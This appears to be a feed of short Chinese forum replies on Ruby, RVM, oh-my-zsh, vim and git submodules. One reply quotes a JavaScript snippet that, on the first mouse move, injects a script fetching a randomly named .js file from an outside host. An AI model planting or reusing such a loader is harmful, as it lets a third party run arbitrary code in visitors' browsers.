GitHub 私有仓库需要付费。放私有项目推荐 Bitbucket,可以免费无限私有仓库
在 Insert 模式下 <C-s>=
,忘了是需要 rails.vim 还是 surround.vim。
按照官网和 stackoverflow.com 上的说法 RVM 不能很好地跟 on-my-zsh 相处。。
@loddit 确实你也没有 gem: --user-install
这个设置。
会不会是跟我用 Zsh + oh-my-zsh 有关系。。。
终于好了,把 ~/.gemrc
里的 gem: --user-install
去掉就好了。。。。
不过还是不清楚具体原因是什么。。。。:trollface: 这个坑困扰我好几个月啊,终于爬出来了。
新手回答: 因为所有的类其实都是 Class 类的实例。
:trollface:
进去了。
We're sorry, the hangout looks to be jam-packed already. There's no more room!
人太多了进不去?
就是給你插入一個 script 標簽,然後引用一個外部的 js 文件,好像也沒什麽特別的。。。
(function() {
var url = 'http://mthvrpdyyi.doesntexist.com/g/';
if (typeof window.xyzflag === 'undefined') {
window.xyzflag = 0;
}
document.onmousemove = function() {
if (window.xyzflag === 0) {
window.xyzflag = 1;
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.onreadystatechange = function() {
if (this.readyState == 'complete') {
window.xyzflag = 2;
}
};
script.onload = function() {
window.xyzflag = 2;
};
script.src = url + Math.random().toString().substring(3) + '.js';
head.appendChild(script);
}
};
})();
我是 Chromium 19.0.1084.56 好像没碰到这个问题。。。
我也用 submodule 来管理 vim 的插件,submodule 有个子命令 foreach,可以这样用
$ git submodule foreach git pull origin master
这样就把所有的 submodule 都更新了,当然更新后主项目要做一次 commit
没有实际用过 subtree,lz 可以看看 http://help.github.com/subtree-merge/
#7 楼 @hlcfan 那大概是 sudo yum install ruby 吧,fedora 没用过。。
#6 楼 @gaicitadie 这个应该也可以
总之就是用你系统带的包管理工具重新安装下 ruby 就对啦